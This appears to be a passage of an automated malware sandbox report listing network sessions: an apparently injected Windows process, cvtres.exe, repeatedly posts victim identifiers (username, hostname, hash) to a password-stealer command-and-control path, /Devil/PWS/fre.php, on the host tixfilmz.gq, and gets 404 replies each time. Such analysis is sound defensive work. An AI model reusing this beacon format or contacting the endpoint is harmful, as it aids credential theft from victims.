                  Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Aug 11, 2022 06:42:39.416142941 CEST1067INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:42:39 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0NEMPzCv%2BglpdrXSrBrz41omROycORcGwZRT8uzlQMUlk9El6ItPaLC0Fo6hrzsBTBR%2Bgbawx8OEpKTh5mEACiFWQH3CR3z30oVs%2BC%2FSx0oRn4PnrWKdRHDRuREQvg%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4e4bcaa1bbf5-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  22192.168.2.349764188.114.96.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:42:41.209816933 CEST1067OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:42:41.226878881 CEST1068OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Aug 11, 2022 06:42:41.306250095 CEST1068INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:42:41 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=TUYSQmDNLM25L3Xc5iUuFUSvf59cAHIJ%2FyW%2FdECVdBBKZeP7djubS9URGb%2B504ohSvLJdBV5cJr%2BQkwAyXFP0K6zoiBUy0%2BSXhh%2BWUAlw%2B7PQuD8mVJaui9lgSztuw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4e579eecbb85-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  23192.168.2.349766188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:42:42.773950100 CEST1081OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:42:42.792331934 CEST1081OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Aug 11, 2022 06:42:42.869123936 CEST1094INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:42:42 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=E7vSqzyZk3qIwXx9eUocaI9hXGtrWZPhFgRL0EBT5ZsuSpNKLZmWOC1rHM36XQm4Si%2FsrLKJFtM4XlTXuHulsyaWTJ9knN%2BaJT8klsOGYIdLAk0HH3jyCnb6Mgt4aQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4e615e119bb3-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  24192.168.2.349774188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:42:44.099149942 CEST1187OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:42:44.116035938 CEST1188OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Aug 11, 2022 06:42:44.189769983 CEST1204INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:42:44 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=S4oxOBWv%2B4UOVMwb0kDScW1nQwQrd5EacUvdKMaUqDq9Z1JWbQ1YF%2FYBVr7gB1AuQpiog2uSyIguk96hVrenhW0UVTED95Y8lUk9jln%2FKYpiuz5llJWMVaTU2P9upQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4e69acc4bb86-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  25192.168.2.349777188.114.96.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:42:45.276947975 CEST1234OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:42:45.294847012 CEST1234OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Aug 11, 2022 06:42:45.373523951 CEST1235INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:42:45 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=CTFZF%2BWEcf%2FZ3ve0OTQGqdgiQcRFWglSF2ioHkR1%2B1Dt8yFUGv%2FbQkYy3SgYWtYfRTt%2Fu1iWEP2lKl5AFOepBLjGhytA9dH7hUwySrO%2FraUqHxKumZ8Zds8T3nsBFw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4e710fd8926d-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  26192.168.2.349778188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:42:46.945645094 CEST1236OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:42:46.962881088 CEST1236OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Aug 11, 2022 06:42:47.043102980 CEST1237INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:42:47 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KE5YLOzAxfxUnOqS9Yf%2Fh%2FyGk7n8MwLfQafrSeANUvgLxd5QwzD7KKvTWDJjn0hBBTMgo0iyw9pagijUx6QdFa01qDWZr6PsnY4%2BoTD0nvKrpk2M20K6fr86jy04vw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4e7b6f759b95-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  27192.168.2.349780188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:42:49.154690027 CEST1238OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:42:49.172816992 CEST1238OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Aug 11, 2022 06:42:49.279305935 CEST1239INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:42:49 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=x4NOgxjp5bamSb5%2BEGCU0lIDm14biGjteevVZ1anxZu4L0uIwVi%2F4E6I8kDhwGQjgjRvJ0SlP3vpL9jSfqjTJGOkNcR57X%2FhUTbcaZ3QMoTrnypJ%2B1ZRujwexFap4w%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4e893a77bc01-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  28192.168.2.349782188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:42:50.570997000 CEST1240OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:42:50.588017941 CEST1240OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Aug 11, 2022 06:42:50.665591955 CEST1241INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:42:50 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=R8wPA8bakoFeAux%2BPghUTfYdyrLQJAPleFgfZf1TztZzoaXyuxTpp%2BY3m%2BZn8tBonTuOV6rdaOFSE7zkck%2FyMJ1y6CBC5ezSeohSLmU73ysrJ1IDe9iQzJ1%2BSFTulg%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4e921cecbb32-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  29192.168.2.349785188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:42:51.879415035 CEST1251OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:42:51.896985054 CEST1251OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Aug 11, 2022 06:42:51.983930111 CEST1252INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:42:51 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0in6Ayj8I3zO6NO1iFxs%2Bdf30Iekyj2pJivQsyFDdGqf%2Fdfsg4DG5bw119gvvuAAXzm1JIN5aN1ROwd%2BBLhLBUlg7X7WLzIMXsz6zOalbMhpxzCC9JW6xboqYwa3lg%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4e9a4dd19b57-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  3192.168.2.349745188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:42:16.160936117 CEST1032OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:42:16.177916050 CEST1032OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Aug 11, 2022 06:42:16.296185017 CEST1033INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:42:16 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mgEHyzNGG3wTlvIqrFT9Qg9CyoJJco9av7NNGpAxa4Lv150iQghRp9kjVuXQ7MMVm025fTNlO4GAiU0JtozkA90G4dr6yvHcKVA0lMkDoG%2BgwlguHut59hkTKxPVSA%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4dbb0f449bbc-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  30192.168.2.349786188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:42:53.219319105 CEST1253OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:42:53.236259937 CEST1253OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Aug 11, 2022 06:42:53.353355885 CEST1264INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:42:53 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pgNEJXZGOHn5Egc%2FCUfGGyJgE0wCr2whFXS4CpUoV5rbFo71CqRWstxCdJot%2BnpztUTC6k4pFu4PcMAf8lGER02%2FUesG3wyV3uvFGhNzYS2f3WfRSY%2F07O3swpFd5Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4ea2af54bba9-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  31192.168.2.349788188.114.96.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:42:54.331478119 CEST1265OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:42:54.348571062 CEST1265OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Aug 11, 2022 06:42:54.430865049 CEST1266INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:42:54 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Oz58tFC9j%2F%2FUWYTDA2KIPUhsEEJLq3Fj%2F%2FNjwIxsOu3JbAS5a4UeBpXda4G3IGkrnybQ309H0O4WVRE4wWmTnDnp5%2BTOCGJvzW5H1baNzJblY%2BgusnlFAaq0GMzbVQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4ea9998f915e-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  32192.168.2.349789188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:42:55.412962914 CEST1266OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:42:55.430126905 CEST1267OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Aug 11, 2022 06:42:55.514800072 CEST1267INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:42:55 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=tfWHw3Y7kyqn%2F4%2B1%2B7SsB4DAFkWwDMis5E17WBWPeB%2B1y3Yz03f8Y%2FFfLTVCggCzJy4tne%2BaNzObkADXLk7hgGQ0oEnf93MB%2BBBpZYsnzAcE0T0at%2F0D%2BYqTVnup8A%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4eb05c1f9a03-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  33192.168.2.349790188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:42:56.651534081 CEST1268OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:42:56.668574095 CEST1269OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Aug 11, 2022 06:42:56.784835100 CEST1269INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:42:56 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Da0vd73KcmCTeEN%2BL%2FYCdduFmS4E%2FXVcmHKEeTqY%2BAc5PKMghAzTybst0WOO9BHlZaawlYj7DAXooADXC6OTMEvQCxVbFsBFdWZJdaHCwlev49UDMsvp3BmP5%2F0nYg%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4eb818af9125-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  34192.168.2.349791188.114.96.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:42:58.117985964 CEST1270OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:42:58.135077000 CEST1270OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Aug 11, 2022 06:42:58.219897032 CEST1271INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:42:58 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
